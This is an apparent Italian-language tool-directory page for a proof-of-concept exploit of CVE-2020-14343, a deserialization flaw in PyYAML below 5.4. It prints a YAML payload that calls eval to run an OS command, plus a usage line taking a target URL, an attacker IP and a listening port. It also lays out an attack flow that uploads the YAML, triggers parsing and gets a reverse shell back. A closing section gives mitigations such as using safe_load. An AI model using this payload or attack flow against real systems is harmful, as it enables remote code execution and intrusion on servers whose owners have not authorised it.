Directory degli strumenti
Categorie
CVE-2020-14343-PyYAML — Payload di CVE-2020-14343 | Kitploit
Strumenti / GitHub / kairo-one / cve-2020-14343-pyyaml
kairo-one/cve-2020-14343-pyyaml CVE-2020-14343-PyYAML Payload di CVE-2020-14343
2 9 mesi faScopri gli strumenti più utilizzati dalla nostra community.
Ultimi 7 Giorni Ultimi 30 Giorni
CVE-2020-14343 PyYAML POC per vulnerabilità di deserializzazione
Panoramica della vulnerabilità
ID CVE CVE-2020-14343 Componente interessato PyYAML < 5.4 Tipo di vulnerabilità Deserializzazione RCE (Remote Code Execution) Livello di pericolosità Alto
Principio della vulnerabilità Quando PyYAML utilizza yaml.load() per analizzare dati non fidati, non limita i tag YAML pericolosi (come !!python/object). Un attaccante può creare contenuti YAML malevoli per eseguire codice Python arbitrario.
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
Utilizzo python poc.py <目标URL> <攻击者IP> <监听端口>
python poc.py http://vulnerable-site.com 192.168.1.100 4444
Flusso dell'attacco
Lo script avvia un listener TCP in locale.
Carica un file YAML malevolo sull'endpoint /upload del target.
Attiva l'endpoint /login per caricare e analizzare il YAML.
Il server target esegue il payload e invia una reverse shell all'attaccante.
Installazione delle dipendenze
Dichiarazione di esclusione di responsabilità ⚠️ Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza e ai test autorizzati!
Non utilizzarlo per scopi illegali.
Prima dell'uso, assicurati di avere l'autorizzazione del sistema target.
L'autore non è responsabile per qualsiasi uso improprio.
Raccomandazioni per la mitigazione
Utilizzare yaml.safe_load() al posto di yaml.load().
Aggiornare PyYAML alla versione 5.4 o successiva.
Effettuare una validazione rigorosa degli input utente.
Collegamenti di riferimento